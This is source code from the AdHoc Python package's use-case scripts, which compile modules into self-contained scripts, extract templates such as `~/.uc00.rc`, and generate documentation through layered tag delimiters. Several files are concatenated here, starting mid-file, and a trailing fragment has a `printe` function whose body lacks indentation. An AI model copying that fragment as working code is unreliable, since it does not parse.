    # <:adhoc_template:@ -alt-sym5
    # @:adhoc_template:@ -alt-sym5
    #
    # by extracting sub-templates::
    #
    # @:adhoc_template:@
    # <:adhoc_template:@
    # @:adhoc_indent:@
    # @:adhoc_indent:@ -0
    # @:adhoc_template:@ -alt-sym5
    details = RtAdHoc.get_named_template('-details', None, template_raw, full_doc_tag)
    # @:adhoc_template:@
    # @:adhoc_indent:@
    # @:adhoc_indent:@ -4
    # <:adhoc_template:@ -alt-sym5
    # @:adhoc_template:@ -alt-sym5
    #
    # providing for a details higlight::
    #
    # @:adhoc_template:@
    # <:adhoc_template:@
    # @:adhoc_indent:@
    print_template(RtAdHoc, '-alt-sym5')
    RtAdHoc.write_source('-', details)
    # @:adhoc_indent:@ -4
    # <:adhoc_template:@ -alt-sym6
    # @:adhoc_template:@ -alt-sym6
    #
    # and by removing sub-template tag lines::
    #
    # @:adhoc_template:@
    # <:adhoc_template:@
    # @:adhoc_indent:@
    # @:adhoc_indent:@ -0
    # @:adhoc_template:@ -alt-sym6
    full_doc = RtAdHoc.section_tag_remove(template_raw, full_doc_tag_sym)
    # @:adhoc_template:@
    # @:adhoc_indent:@
    # @:adhoc_indent:@ -4
    # <:adhoc_template:@ -alt-sym6
    # @:adhoc_template:@ -alt-sym6
    #
    # providing the full documentation (full_doc)::
    #
    # @:adhoc_template:@
    # <:adhoc_template:@
    # @:adhoc_indent:@
    print_template(RtAdHoc, '-alt-sym6')
    RtAdHoc.write_source('-', full_doc)
    # @:adhoc_uncomment:@
    # |:here:|
    # @:adhoc_uncomment:@
    # @:adhoc_indent:@ -4
    # <:adhoc_template:@ -alt-dlm1
    # @:adhoc_template:@ -alt-dlm1
    # Alternate Tag Delimiters
    # ~~~~~~~~~~~~~~~~~~~~~~~~
    #
    # The same documentation tagged with different tag delimiters::
    #
    # @:adhoc_template:@
    # <:adhoc_template:@
    # @:adhoc_indent:@
    print_template(RtAdHoc, '-alt-dlm1')
    RtAdHoc.write_source('-', example2)
    # @:adhoc_indent:@ -4
    # <:adhoc_template:@ -alt-dlm2
    # @:adhoc_template:@ -alt-dlm2
    #
    # After getting the raw template::
    #
    # @:adhoc_template:@
    # <:adhoc_template:@
    # @:adhoc_indent:@
    # @:adhoc_indent:@ -0
    # <:adhoc_template:@ -alt-dlm2
    # @:adhoc_template:@ -alt-dlm2
    template_raw = RtAdHoc.get_named_template('-doc', __file__)
    # @:adhoc_template:@
    # <:adhoc_template:@
    # @:adhoc_indent:@
    template_raw = RtAdHoc.get_named_template('-doc', None, example2)
    print_template(RtAdHoc, '-alt-dlm2')
    # @:adhoc_indent:@ -4
    # <:adhoc_template:@ -alt-dlm3
    # @:adhoc_template:@ -alt-dlm3
    #
    # the delimiters are changed for the documentation detail sections::
    #
    # @:adhoc_template:@
    # <:adhoc_template:@
    # @:adhoc_indent:@
    # @:adhoc_indent:@ -0
    # @:adhoc_template:@ -alt-dlm3
    full_doc_delimiters = ('@:', ':>')
    state = RtAdHoc.set_delimiters(full_doc_delimiters)
    # @:adhoc_template:@
    # @:adhoc_indent:@
    RtAdHoc.reset_delimiters(state)
    print_template(RtAdHoc, '-alt-dlm3')
    # @:adhoc_indent:@ -4
    # <:adhoc_template:@ -alt-dlm4
    # @:adhoc_template:@ -alt-dlm4
    #
    # and the same parts as with `Alternate Tag Symbols`_ are generated::
    #
    # @:adhoc_template:@
    # <:adhoc_template:@
    # @:adhoc_indent:@
    # @:adhoc_indent:@ -0
    # @:adhoc_template:@ -alt-dlm4
    short_doc = RtAdHoc.remove_sections(template_raw, 'adhoc_template')
    details = RtAdHoc.get_named_template('-details', None, template_raw)
    full_doc = RtAdHoc.section_tag_remove(template_raw, 'adhoc_template')
    # @:adhoc_template:@
    # @:adhoc_indent:@
    print_template(RtAdHoc, '-alt-dlm4')
    # @:adhoc_indent:@ -4
    # <:adhoc_template:@ -alt-dlm5
    # @:adhoc_template:@ -alt-dlm5
    #
    # It is good practice to restore the previous delimiter set::
    #
    # @:adhoc_template:@
    # <:adhoc_template:@
    # @:adhoc_indent:@
    # @:adhoc_indent:@ -0
    # @:adhoc_template:@ -alt-dlm5
    RtAdHoc.reset_delimiters(state)
    # @:adhoc_template:@
    # <:adhoc_template:@
    # @:adhoc_indent:@
    print_template(RtAdHoc, '-alt-dlm5')
# --------------------------------------------------
# |||:sec:||| Script
# --------------------------------------------------
# Run the generator when executed directly; do nothing on import.
as_module = (__name__ != '__main__')
if not as_module:
    if main(sys.argv):
        exit(0)
if not as_module:
    pass
# :ide: COMPILE: Run with --compile
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --compile")))
# :ide: COMPILE: Run with --compile >use_case_005_nested.py
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --compile >use_case_005_nested.py")))
# :ide: COMPILE: Run with --template
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --template")))
# :ide: COMPILE: Run with --doc
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --doc")))
# :ide: COMPILE: Run with --doc | diff
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --doc | ( if test -r uc005; then echo 'DIFF'; diff -u uc005 -; else echo 'STORE'; cat >uc005; fi)")))
# :ide: COMPILE: Run with --help
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --help")))
# :ide: COMPILE: Run with python3
# . (progn (save-buffer) (compile (concat "python3 ./" (file-name-nondirectory (buffer-file-name)) "")))
# :ide: COMPILE: Run w/o args
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) "")))
# :ide: +-#+
# . Compile ()
#
# Local Variables:
# mode: python
# comment-start: "#"
# comment-start-skip: "#+"
# comment-column: 0
# truncate-lines: t
# End:
# --------------------------------------------------
# @|:uc_descr_beg:|>
# Module Imports
# --------------
#
# Imported modules are optionally zipped and base64-encoded. They are
# automatically unpacked internally and set up as modules in
# sys.modules as required.
#
# They can also be unpacked via the :meth:`adhoc.AdHoc.extract` and
# :meth:`adhoc.AdHoc.get_named_template` mechanisms.
#
# The following Python script imports the module ``adhoc_test.sub``.
# This also triggers the import of ``adhoc_test``, which is therefore
# also included.
#
# Import compilation is recursive. I.e., if a module contains its own
# adhoc tags, they are also processed.
#
# .. note:: When exported, modules are not recreated at the original
# locations, but locally below the export directory.
#
# @|:uc_descr_out:|>
# @|:uc_descr_end:|>
# --------------------------------------------------
# |||:sec:||| Generator
# --------------------------------------------------
# Document macros for the use-case generator.  Each tag string below is
# assembled from adjacent string literals (implicit concatenation), so
# that the generator does not match its own section tags when it scans
# this source file.
uc_descr_beg = (
    '# <:' 'adhoc_uncomment:>\n'
    '# o:' 'adhoc_template:>\n'
    '# i:' 'adhoc_template:>\n'
    )
# Separates the "input" part of a description from the "output" part.
uc_descr_out = (
    '# i:' 'adhoc_template:>\n'
    )
# Closes a description section opened by `uc_descr_beg`.
uc_descr_end = (
    '# o:' 'adhoc_template:>\n'
    '# <:' 'adhoc_uncomment:>\n'
    )
# Opens a code section indented by 4 spaces, shown in all parts.
uc_code_beg = (
    '# i:' 'adhoc_indent:> 4\n'
    '# <:' 'adhoc_template:>\n'
    )
# Closes a code section opened by `uc_code_beg`.
uc_code_end = (
    '# <:' 'adhoc_template:>\n'
    '# i:' 'adhoc_indent:>\n'
    )
# Macro name -> expansion mapping, installed as `RtAdHoc.macros` in main().
macros = {
    'uc_descr_beg': uc_descr_beg,
    'uc_descr_out': uc_descr_out,
    'uc_descr_end': uc_descr_end,
    'uc_code_beg': uc_code_beg,
    'uc_code_end': uc_code_end,
    }
def main(argv):
    """Compiler and help/example/documentation extractor.

    Dispatches on the first command line argument:
      ``-h``/``--h*``  print the module docstring,
      ``--t*``         print the documentation template,
      ``--r*``         compile and run the result in a scratch directory,
      ``--c*``         print the compiled script,
      ``--d*``         print the generated use-case documentation.

    :returns: 1 when an option was handled (caller should exit), 0 otherwise.
    """
    global RtAdHoc
    RtAdHoc.macros = macros
    if len(argv) > 1:
        if argv[1].startswith('-h') or argv[1].startswith('--h'):
            print(__doc__)
            return 1
        if (argv[1].startswith('--c')
            or argv[1].startswith('--d')
            or argv[1].startswith('--t')
            or argv[1].startswith('--r')):
            file_, source = RtAdHoc.std_source_param(__file__)
            if 'adhoc' not in globals() and 'rt_adhoc' not in globals():
                # Running the compiled script: it IS the compiled output.
                compiled = source
                source = RtAdHoc.export_source(source)
            else:
                if 'adhoc' not in globals():
                    # this will most certainly fail
                    from adhoc import AdHoc as RtAdHoc
                    RtAdHoc.macros = macros
                compiled = None
            if argv[1].startswith('--t'):
                # switch to meta tags
                sv = RtAdHoc.set_delimiters(('<:', ':>'))
                docu_input = RtAdHoc.activate_macros(source)
                docu_input = docu_input.replace('t:' 'adhoc', '<:' 'adhoc')
                docu_input = docu_input.replace('u:' 'adhoc', '@:' 'adhoc')
                docu_input = RtAdHoc.get_named_template(source=docu_input)
                docu_input = RtAdHoc.line_tag_remove(docu_input, '[^:]+', True, ('o:', ':>'))
                docu_input = RtAdHoc.line_tag_remove(docu_input, '[^:]+', True, ('i:', ':>'))
                RtAdHoc.write_source('-', docu_input)
                RtAdHoc.reset_delimiters(sv)
                return 1
            if compiled is None:
                compiled = RtAdHoc().compile(source.replace('u:' 'adhoc', '@:' 'adhoc'))
            if argv[1].startswith('--r'):
                # Run the compiled script in a scratch directory.
                import shutil
                tdir = 'use_case_003_import_test'
                tscript = 'use_case_003_import_.py'
                cwd = os.getcwd()
                if os.path.exists(tdir):
                    shutil.rmtree(tdir)
                if not os.path.exists(tdir):
                    os.mkdir(tdir)
                os.chdir(tdir)
                RtAdHoc.write_source(tscript, compiled.replace('@:' 'adhoc', 'u:' 'adhoc'))
                os.system(''.join((sys.executable, ' ', tscript)))
                os.chdir(cwd)
                if os.path.exists(tdir):
                    shutil.rmtree(tdir)
                return 1
            if argv[1].startswith('--c'):
                RtAdHoc.write_source('-', compiled.replace('@:' 'adhoc', 'u:' 'adhoc'))
                return 1
            if argv[1].startswith('--d'):
                # switch to meta tags
                sv = RtAdHoc.set_delimiters(('<:', ':>'))
                docu_input = RtAdHoc.activate_macros(source)
                docu_input = docu_input.replace('i:' 'adhoc', '<:' 'adhoc')
                docu_input = docu_input.replace('u:' 'adhoc', '@:' 'adhoc')
                docu_input = RtAdHoc.get_named_template(source=docu_input)
                docu_input = RtAdHoc.line_tag_remove(docu_input, '[^:]+', True, ('o:', ':>'))
                RtAdHoc.write_source('-', docu_input)
                docu_input = RtAdHoc.activate_macros(compiled)
                docu_input = docu_input.replace('i:' 'adhoc', '<:' 'adhoc')
                docu_input = docu_input.replace('o:' 'adhoc', '<:' 'adhoc')
                docu_input = docu_input.replace('u:' 'adhoc', '@:' 'adhoc')
                docu_input = RtAdHoc.get_named_template(source=docu_input)
                RtAdHoc.write_source('-', docu_input)
                RtAdHoc.reset_delimiters(sv)
                return 1
        # BUG FIX: the original used `map(sys.stderr.write, ...)`, which
        # is a lazy iterator in Python 3 and therefore wrote nothing.
        sys.stderr.write(''.join(('error: unknown option `',
                                  str(argv[1]), '`\n')))
        exit(1)
    return 0
# --------------------------------------------------
# |||:sec:||| Script
# --------------------------------------------------
# --------------------------------------------------
# @|:uc_descr_beg:|>
# **Uncompiled Script**
#
# The script starts with `Generic AdHoc Initialization`_::
#
# @|:uc_descr_out:|>
# **Compiled Script**
#
# @|:uc_descr_end:|>
# @|:uc_code_beg:|>
# o:adhoc_template:>
# @:adhoc_run_time:@
# o:adhoc_template:>
# @|:uc_code_end:|>
# i:adhoc_indent:> 4
# t:adhoc_template:>
# o:adhoc_template:>
# i:adhoc_template:>
# @:adhoc_disable:@
# Get RtAdHoc from adhoc or rt_adhoc
# Directories from PATH are appended to sys.path so a co-located
# adhoc.py/rt_adhoc.py can be found, and sys.path is restored after.
import os
import sys
os_path = os.defpath
if 'PATH' in os.environ:
    os_path = os.environ['PATH']
# BUG FIX: `sys_path = sys.path` only aliased the list, so extending
# sys.path also "extended" the saved copy and the restore below was a
# no-op, leaving all PATH directories on sys.path.  Take a real copy.
sys_path = list(sys.path)
sys.path.extend(os_path.split(os.pathsep))
try:
    import adhoc
    from adhoc import AdHoc as RtAdHoc
except ImportError:
    try:
        import rt_adhoc
        from rt_adhoc import RtAdHoc
    except ImportError:
        pass
sys.path = sys_path
# @:adhoc_disable:@
# i:adhoc_template:>
# o:adhoc_template:>
# t:adhoc_template:>
# i:adhoc_indent:>
# meta program
# Run the generator when executed directly; do nothing on import.
as_module = (__name__ != '__main__')
if not as_module:
    if main(sys.argv):
        exit(0)
if not as_module:
    pass
# t:adhoc_indent:> -4
# --------------------------------------------------
# @|:uc_descr_beg:|>
# ``import adhoc_test.sub`` is marked for inclusion at compile time::
#
# @|:uc_descr_out:|>
# Module ``adhoc_test`` is prepared as module through
# :meth:`adhoc.AdHoc.import_` as requirement before module
# ``adhoc_test.sub`` in the compiled script. The original ``import``
# statement then finds the pre-imported versions::
#
# @|:uc_descr_end:|>
# <:adhoc_template:>
import adhoc_test.sub # @:adhoc:@ force
# <:adhoc_template:>
# Temporarily switch the section delimiters so that the `u:` tags in
# this file are recognized by the template machinery.
sv = RtAdHoc.section_delimiters
RtAdHoc.section_delimiters = ('u:', ':@')
# <:adhoc_uncomment:>
# t:adhoc_template:>
# <:adhoc_template:>
# Expected output is ``adhoc_test.sub.ADHOC_TEST_SUB_IMPORTED: True``::
#
# <:adhoc_template:>
# t:adhoc_template:>
# <:adhoc_uncomment:>
# <:adhoc_template:>
print('adhoc_test.sub.ADHOC_TEST_SUB_IMPORTED: '
      + str(adhoc_test.sub.ADHOC_TEST_SUB_IMPORTED))
# <:adhoc_template:>
# <:adhoc_uncomment:>
# t:adhoc_template:>
# <:adhoc_template:>
# Expected output is ``adhoc_test.ADHOC_TEST_IMPORTED: True``::
#
# <:adhoc_template:>
# t:adhoc_template:>
# <:adhoc_uncomment:>
# <:adhoc_template:>
print('adhoc_test.ADHOC_TEST_IMPORTED: '
      + str(adhoc_test.ADHOC_TEST_IMPORTED))
# <:adhoc_template:>
# <:adhoc_uncomment:>
# t:adhoc_template:>
# <:adhoc_template:>
# Setup ``use_case_003_export`` as export directory::
#
# <:adhoc_template:>
# t:adhoc_template:>
# <:adhoc_uncomment:>
# <:adhoc_template:>
RtAdHoc.quiet = True
RtAdHoc.export_dir = 'use_case_003_export'
# <:adhoc_template:>
import shutil
# Start from a clean export directory so results are reproducible.
if os.path.exists(RtAdHoc.export_dir):
    shutil.rmtree(RtAdHoc.export_dir)
# <:adhoc_template:>
RtAdHoc.export(__file__)
# <:adhoc_template:>
# <:adhoc_uncomment:>
# t:adhoc_template:>
# <:adhoc_template:>
# Show export results::
#
# <:adhoc_template:>
# t:adhoc_template:>
# <:adhoc_uncomment:>
# <:adhoc_template:>
if os.path.exists(RtAdHoc.export_dir):
    for dir_, subdirs, files in os.walk(RtAdHoc.export_dir):
        for file_ in sorted(files):
            # was `map(sys.stdout.write, ...)`: lazy in Python 3, no output
            sys.stdout.write(os.path.join(dir_, file_))
            sys.stdout.write('\n')
# <:adhoc_template:>
# --------------------------------------------------
# @|:uc_descr_beg:|>
# The uncompiled script effectively copies itself into ``use_case_003_export``,
# but does not create the ``adhoc_test`` module::
#
#     use_case_003_export/use_case_003_import_.py
#
# @|:uc_descr_out:|>
# Besides the original version of itself, the compiled script also
# recreates ``adhoc_test`` and ``adhoc_test.sub`` in the export
# directory::
#
#     use_case_003_export/use_case_003_import_.py
#     use_case_003_export/adhoc_test/__init__.py
#     use_case_003_export/adhoc_test/sub/__init__.py
#
# @|:uc_descr_end:|>
# Restore the saved section delimiters and remove the export directory.
RtAdHoc.section_delimiters = sv
if os.path.exists(RtAdHoc.export_dir):
    shutil.rmtree(RtAdHoc.export_dir)
# --------------------------------------------------
# t:adhoc_indent:>
# :ide: COMPILE: Run with --compile
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --compile")))
# :ide: COMPILE: Run with --compile >use_case_003_import.py
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --compile >use_case_003_import.py")))
# :ide: COMPILE: Run with --run-compiled
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --run-compiled")))
# :ide: COMPILE: Run with --template
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --template")))
# :ide: COMPILE: Run with --doc
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --doc")))
# :ide: COMPILE: Run with --doc | diff
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --doc | ( if test -r uc003; then echo 'DIFF'; diff -u uc003 -; else echo 'STORE'; cat >uc003; fi)")))
# :ide: COMPILE: Run with --help
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --help")))
# :ide: COMPILE: Run with python3
# . (progn (save-buffer) (compile (concat "python3 ./" (file-name-nondirectory (buffer-file-name)) "")))
# :ide: COMPILE: Run w/o args
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) "")))
# :ide: +-#+
# . Compile ()
#
# Local Variables:
# mode: python
# comment-start: "#"
# comment-start-skip: "#+"
# comment-column: 0
# truncate-lines: t
# End:
# @|:uc_descr_beg:|>
# Template Extraction
# -------------------
#
# Templates are useful, if some code snippet is to be executed and
# should also be available to initialize, e.g., RC files.
#
# The following Python script defines a template ``~/.uc00.rc``, which
# is extracted, if it does not already exist.
#
# @|:uc_descr_out:|>
# @|:uc_descr_end:|>
# --------------------------------------------------
# |||:sec:||| Generator
# --------------------------------------------------
# Document macros for the use-case generator.  The tag strings are
# assembled from adjacent string literals (implicit concatenation), so
# that the generator does not match its own section tags in this file.
uc_descr_beg = (
    '# <:' 'adhoc_uncomment:>\n'
    '# o:' 'adhoc_template:>\n'
    '# i:' 'adhoc_template:>\n'
    )
# Separates the "input" part of a description from the "output" part.
uc_descr_out = (
    '# i:' 'adhoc_template:>\n'
    )
# Closes a description section opened by `uc_descr_beg`.
uc_descr_end = (
    '# o:' 'adhoc_template:>\n'
    '# <:' 'adhoc_uncomment:>\n'
    )
# Opens a code section indented by 4 spaces.
uc_code_beg = (
    '# i:' 'adhoc_indent:> 4\n'
    '# <:' 'adhoc_template:>\n'
    )
"""
Code shown in all parts (indented 4).
"""
# Closes a code section opened by `uc_code_beg`.
uc_code_end = (
    '# <:' 'adhoc_template:>\n'
    '# i:' 'adhoc_indent:>\n'
    )
# "ti" variants select which documentation parts show the code.
uc_code_ti_beg = (
    '# t:' 'adhoc_template:>\n'
    '# o:' 'adhoc_template:>\n'
    '# i:' 'adhoc_template:>\n'
    )
"""
Code shown in template and input part.
"""
uc_code_ti_out = (
    '# i:' 'adhoc_template:>\n'
    )
"""
Code shown in output part.
"""
uc_code_ti_end = (
    '# o:' 'adhoc_template:>\n'
    '# t:' 'adhoc_template:>\n'
    )
# Macro name -> expansion mapping, installed as `RtAdHoc.macros` in main().
macros = {
    'uc_descr_beg': uc_descr_beg,
    'uc_descr_out': uc_descr_out,
    'uc_descr_end': uc_descr_end,
    'uc_code_beg': uc_code_beg,
    'uc_code_end': uc_code_end,
    'uc_code_ti_beg': uc_code_ti_beg,
    'uc_code_ti_out': uc_code_ti_out,
    'uc_code_ti_end': uc_code_ti_end,
    }
def main(argv):
    """Compiler and help/example/documentation extractor.

    Dispatches on the first command line argument:
      ``-h``/``--h*``  print the module docstring,
      ``--t*``         print the documentation template,
      ``--c*``         print the compiled script,
      ``--d*``         print the generated use-case documentation.

    :returns: 1 when an option was handled (caller should exit), 0 otherwise.
    """
    global RtAdHoc
    RtAdHoc.macros = macros
    if len(argv) > 1:
        if argv[1].startswith('-h') or argv[1].startswith('--h'):
            print(__doc__)
            return 1
        if (argv[1].startswith('--c')
            or argv[1].startswith('--d')
            or argv[1].startswith('--t')):
            file_, source = RtAdHoc.std_source_param(__file__)
            if 'adhoc' not in globals() and 'rt_adhoc' not in globals():
                # Running the compiled script: it IS the compiled output.
                compiled = source
                source = RtAdHoc.export_source(source)
            else:
                if 'adhoc' not in globals():
                    # this will most certainly fail
                    from adhoc import AdHoc as RtAdHoc
                    RtAdHoc.macros = macros
                compiled = None
            if argv[1].startswith('--t'):
                # switch to meta tags
                sv = RtAdHoc.set_delimiters(('<:', ':>'))
                docu_input = RtAdHoc.activate_macros(source)
                docu_input = docu_input.replace('t:' 'adhoc_', '<:' 'adhoc_')
                docu_input = docu_input.replace('u:' 'adhoc_', '@:' 'adhoc_')
                docu_input = RtAdHoc.get_named_template(source=docu_input)
                docu_input = RtAdHoc.line_tag_remove(docu_input, '[^:]+', True, ('o:', ':>'))
                docu_input = RtAdHoc.line_tag_remove(docu_input, '[^:]+', True, ('i:', ':>'))
                RtAdHoc.write_source('-', docu_input)
                RtAdHoc.reset_delimiters(sv)
                return 1
            if compiled is None:
                compiled = RtAdHoc().compileFile(__file__, source)
            if argv[1].startswith('--c'):
                RtAdHoc.write_source('-', compiled)
                return 1
            if argv[1].startswith('--d'):
                # switch to meta tags
                sv = RtAdHoc.set_delimiters(('<:', ':>'))
                docu_input = RtAdHoc.activate_macros(source)
                docu_input = docu_input.replace('i:' 'adhoc_', '<:' 'adhoc_')
                docu_input = docu_input.replace('u:' 'adhoc_', '@:' 'adhoc_')
                docu_input = RtAdHoc.get_named_template(source=docu_input)
                docu_input = RtAdHoc.line_tag_remove(docu_input, '[^:]+', True, ('o:', ':>'))
                RtAdHoc.write_source('-', docu_input)
                docu_input = RtAdHoc.activate_macros(compiled)
                docu_input = docu_input.replace('i:' 'adhoc_', '<:' 'adhoc_')
                docu_input = docu_input.replace('o:' 'adhoc_', '<:' 'adhoc_')
                docu_input = docu_input.replace('u:' 'adhoc_', '@:' 'adhoc_')
                docu_input = RtAdHoc.get_named_template(source=docu_input)
                RtAdHoc.write_source('-', docu_input)
                RtAdHoc.reset_delimiters(sv)
                return 1
        # BUG FIX: the original used `map(sys.stderr.write, ...)`, which
        # is a lazy iterator in Python 3 and therefore wrote nothing.
        sys.stderr.write(''.join(('error: unknown option `',
                                  str(argv[1]), '`\n')))
        exit(1)
    return 0
# --------------------------------------------------
# |||:sec:||| Script
# --------------------------------------------------
# --------------------------------------------------
# @|:uc_descr_beg:|>
# The script starts with `Generic AdHoc Initialization`_::
#
# @|:uc_descr_out:|>
# @|:uc_descr_end:|>
# i:adhoc_indent:> 4
# @|:uc_code_ti_beg:|>
# @:adhoc_run_time:@
# @:adhoc_disable:@
# Get RtAdHoc from adhoc or rt_adhoc
# Directories from PATH are appended to sys.path so a co-located
# adhoc.py/rt_adhoc.py can be found, and sys.path is restored after.
import os
import sys
os_path = os.defpath
if 'PATH' in os.environ:
    os_path = os.environ['PATH']
# BUG FIX: `sys_path = sys.path` only aliased the list, so extending
# sys.path also "extended" the saved copy and the restore below was a
# no-op, leaving all PATH directories on sys.path.  Take a real copy.
sys_path = list(sys.path)
sys.path.extend(os_path.split(os.pathsep))
try:
    import adhoc
    from adhoc import AdHoc as RtAdHoc
except ImportError:
    try:
        import rt_adhoc
        from rt_adhoc import RtAdHoc
    except ImportError:
        pass
sys.path = sys_path
# @:adhoc_disable:@
# @|:uc_code_ti_out:|>
# @|:uc_code_ti_end:|>
# i:adhoc_indent:>
# meta program
# Run the generator when executed directly; do nothing on import.
as_module = (__name__ != '__main__')
if not as_module:
    if main(sys.argv):
        exit(0)
if not as_module:
    pass
# t:adhoc_indent:> -4
# --------------------------------------------------
# @|:uc_descr_beg:|>
# Setup of some default values, enclosed in a template declaration::
#
# @|:uc_descr_out:|>
# @|:uc_descr_end:|>
# u:adhoc_indent:@ -4
# @|:uc_code_ti_beg:|>
rc_file_name = '~/.uc00.rc'
# u:adhoc_template:@ ~/.uc00.rc
# -*- coding: utf-8 -*-
default_value = 'default'
another_value = 'other'
# u:adhoc_template:@
# @|:uc_code_ti_out:|>
# @|:uc_code_ti_end:|>
# u:adhoc_indent:@
# --------------------------------------------------
# @|:uc_descr_beg:|>
# Template extraction makes sure, that the file ``~/.uc00.rc`` exists,
# if the user's home directory is writable::
#
# @|:uc_descr_out:|>
# @|:uc_descr_end:|>
# Temporarily switch the section delimiters so that the `u:` tags in
# this file are recognized by the template machinery.
sv = RtAdHoc.section_delimiters
RtAdHoc.section_delimiters = ('u:', ':@')
# @|:uc_code_ti_beg:|>
RtAdHoc.quiet = True
RtAdHoc.extract_templates(__file__)
# @|:uc_code_ti_out:|>
# @|:uc_code_ti_end:|>
# Restore the previously saved delimiter set.
RtAdHoc.section_delimiters = sv
# --------------------------------------------------
# @|:uc_descr_beg:|>
# Read ``~/.uc00.rc``, if available, and define variables::
#
# @|:uc_descr_out:|>
# @|:uc_descr_end:|>
# @|:uc_code_ti_beg:|>
rc_file = os.path.expanduser(rc_file_name)
try:
    rc_source = RtAdHoc.read_source(rc_file, decode=False)
    exec(rc_source, globals(), locals())
except IOError:
    pass
print('default_value: ' + default_value)
print('another_value: ' + another_value)
# @|:uc_code_ti_out:|>
# @|:uc_code_ti_end:|>
# --------------------------------------------------
# t:adhoc_indent:>
# :ide: COMPILE: Run with --compile
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --compile")))
# :ide: COMPILE: Run with --compile >use_case_001_templates.py
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --compile >use_case_001_templates.py")))
# :ide: COMPILE: Run with --template
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --template")))
# :ide: COMPILE: Run with --doc
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --doc")))
# :ide: COMPILE: Run with --doc | diff
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --doc | ( if test -r uc001; then echo 'DIFF'; diff -u uc001 -; else echo 'STORE'; cat >uc001; fi)")))
# :ide: COMPILE: Run with --help
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --help")))
# :ide: COMPILE: Run with python3
# . (progn (save-buffer) (compile (concat "python3 ./" (file-name-nondirectory (buffer-file-name)) "")))
# :ide: COMPILE: Run w/o args
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) "")))
# :ide: +-#+
# . Compile ()
#
# Local Variables:
# mode: python
# comment-start: "#"
# comment-start-skip: "#+"
# comment-column: 0
# truncate-lines: t
# End: | AdHoc | /AdHoc-0.3.2.tar.gz/AdHoc-0.3.2/use_case_001_templates_.py | use_case_001_templates_.py |
def sformat(fmt, *args, **kwargs):
    """Shorthand for ``fmt.format(*args, **kwargs)``."""
    formatted = fmt.format(*args, **kwargs)
    return formatted
def printe(*args, **kwargs):
sys.stderr.write(' '.join(args))
sys.stderr.write('\n')
# Debugging display defaults; a pre-existing truthy global overrides them
# (a falsy pre-set value falls back to the default, as before).
dbg_comm = globals().get('dbg_comm') or '# '
dbg_twid = globals().get('dbg_twid') or 9
dbg_fwid = globals().get('dbg_fwid') or 15
# --------------------------------------------------
# @|:uc_descr_beg:|>
# Use Cases
# =========
#
# The initial incentive for the :mod:`adhoc` compiler was to have a
# means for including development libraries that are not ready for
# `PyPI`_ (and maybe never will). (See `Module Imports`_).
#
# The problem with these libraries is that they are not available on
# all systems and may not be worth the effort of a full-blown
# :mod:`distutils` package.
#
# If the API is heavily in flux, it is also nice to be able to take an
# arbitrary stable snapshot without version fiddling and carry
# everything around in a self-contained single file script. This
# eliminates the need to follow API changes in support libraries
# immediately.
#
# Creating a Python script instead of an archive eliminates the
# installation step.
#
# Including the importer/extractor as verbatim code eliminates the
# need for a run-time system to be installed. (See `Generic AdHoc
# Initialization`_).
#
# Modifications of the main script can be made trivially.
#
# The export mechanism allows arbitrary modifications of the main
# script and all adhoc'ed imports.
#
# The ``adhoc.py`` compiler script is only needed, if an exported
# script should be compiled again.
#
# Non-Module `Included Files`_ and `Template Extraction`_ are logical
# expansions of the basic concept.
#
# .. note:: Self-referential stuff gets pretty hilarious after a while
# ... The script for generating the use case documentation has
# some two and a half layers of template tagging ``:)``
#
# .. _`PyPI`: http://pypi.python.org
#
# @|:uc_descr_out:|>
# @|:uc_descr_end:|>
# --------------------------------------------------
# @|:uc_descr_beg:|>
# Generic AdHoc Initialization
# ----------------------------
#
# If only automatic import and unpacking features are used, the
# standard initialization with a |adhoc_run_time| tag is sufficient.
# This includes the export, extract and template features, if only
# used in the compiled script.
#
# However, it is convenient that the uncompiled, compiled and exported
# versions of a script behave identically (especially for templates).
# That is the purpose of this generic initialization example.
#
# The use case documentation generator scripts contain an example
# :func:`main` function, which compiles/uncompiles the script on
# demand.
#
# A more complete example can be found in the command line argument
# evaluation part of the :func:`main` function in
# ``namespace_dict.py``
#
# The most complex example is available in the command line argument
# evaluation part of the :func:`main` function in ``adhoc.py``.
# @|:uc_descr_out:|>
# @|:uc_descr_end:|>
# --------------------------------------------------
# |||:sec:||| Tag Description
# --------------------------------------------------
# u:adhoc_
# standard tag replacement to avoid template generation on
# extraction.
#
# <:adhoc_
# meta tags for example template
#
# i:adhoc_
# meta tags for input documentation
#
# o:adhoc_
# meta tags for output documentation
#
# t:adhoc_
# example template indent
#
# --------------------------------------------------
# |||:sec:||| Document Macros
# --------------------------------------------------
# Usage of input/output description sections:
#
# @|: uc_descr_beg :|>
#
# Describe input
#
# @|: uc_descr_out :|>
#
# Describe output
#
# @|: uc_descr_end :|>
# @:adhoc_template:@ -macros
uc_descr_beg = (
